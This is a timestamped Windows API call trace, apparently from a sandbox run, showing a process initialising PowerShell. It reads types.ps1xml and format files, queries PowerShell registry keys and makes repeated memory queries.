	[0317.247] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.247] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.247] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.248] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.248] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.248] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.249] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.249] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.252] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.253] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.253] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.253] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.254] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.254] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.254] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.254] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0317.255] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x1b4, lpOverlapped=0x0) returned 1
	[0317.255] ReadFile (in: hFile=0x330, lpBuffer=0x2cb3810, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd4a8, lpOverlapped=0x0 | out: lpBuffer=0x2cb3810*, lpNumberOfBytesRead=0x1cd4a8*=0x0, lpOverlapped=0x0) returned 1
	[0317.255] CloseHandle (hObject=0x330) returned 1
	[0317.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0317.255] SetErrorMode (uMode=0x1) returned 0x1
	[0317.255] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd420 | out: lpFileInformation=0x1cd420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0317.255] SetErrorMode (uMode=0x1) returned 0x1
	[0317.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0317.256] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd508 | out: phkResult=0x1cd508*=0x330) returned 0x0
	[0317.256] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd48c, lpData=0x0, lpcbData=0x1cd488*=0x0 | out: lpType=0x1cd48c*=0x1, lpData=0x0, lpcbData=0x1cd488*=0x56) returned 0x0
	[0317.256] CoTaskMemAlloc (cb=0x5a) returned 0x3b0ec0
	[0317.256] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd45c, lpData=0x3b0ec0, lpcbData=0x1cd458*=0x56 | out: lpType=0x1cd45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd458*=0x56) returned 0x0
	[0317.256] CoTaskMemFree (pv=0x3b0ec0) 
	[0317.256] RegCloseKey (hKey=0x330) returned 0x0
	[0317.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0317.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0317.914] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.921] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.921] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.922] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.923] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.923] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.924] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0317.925] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.213] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.213] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.213] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.213] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.213] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.213] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.214] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.214] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.218] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.223] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.223] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.223] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.224] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.224] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.224] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.224] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.224] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.225] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.225] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.225] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.225] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.225] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.227] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.229] VirtualQuery (in: lpAddress=0x1cc200, lpBuffer=0x1cd0c0, dwLength=0x30 | out: lpBuffer=0x1cd0c0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.229] VirtualQuery (in: lpAddress=0x1cc200, lpBuffer=0x1cd0c0, dwLength=0x30 | out: lpBuffer=0x1cd0c0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.229] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.230] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.240] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.240] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.240] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.243] CoTaskMemAlloc (cb=0x104) returned 0x3d2890
	[0318.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3d2890, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0318.243] CoTaskMemFree (pv=0x3d2890) 
	[0318.244] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.248] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.248] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.248] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.249] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.249] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.249] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.250] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.251] VirtualQuery (in: lpAddress=0x1cc1f0, lpBuffer=0x1cd0b0, dwLength=0x30 | out: lpBuffer=0x1cd0b0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0318.251] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd6a8 | out: phkResult=0x1cd6a8*=0x32c) returned 0x0
	[0318.252] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x1cd6bc, lpData=0x0, lpcbData=0x1cd6b8*=0x0 | out: lpType=0x1cd6bc*=0x1, lpData=0x0, lpcbData=0x1cd6b8*=0x74) returned 0x0
	[0318.252] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x1cd62c, lpData=0x0, lpcbData=0x1cd628*=0x0 | out: lpType=0x1cd62c*=0x1, lpData=0x0, lpcbData=0x1cd628*=0x74) returned 0x0
	[0318.252] CoTaskMemAlloc (cb=0x78) returned 0x368810
	[0318.252] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x1cd5fc, lpData=0x368810, lpcbData=0x1cd5f8*=0x74 | out: lpType=0x1cd5fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd5f8*=0x74) returned 0x0
	[0318.252] CoTaskMemFree (pv=0x368810) 
	[0318.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0318.252] SetErrorMode (uMode=0x1) returned 0x1
	[0318.252] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd580 | out: lpFileInformation=0x1cd580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0318.252] SetErrorMode (uMode=0x1) returned 0x1
	[0318.252] SetErrorMode (uMode=0x1) returned 0x1
	[0318.252] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd580 | out: lpFileInformation=0x1cd580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0318.253] SetErrorMode (uMode=0x1) returned 0x1
	[0318.253] SetErrorMode (uMode=0x1) returned 0x1
	[0318.253] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd580 | out: lpFileInformation=0x1cd580*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0318.253] SetErrorMode (uMode=0x1) returned 0x1
	[0318.253] SetErrorMode (uMode=0x1) returned 0x1
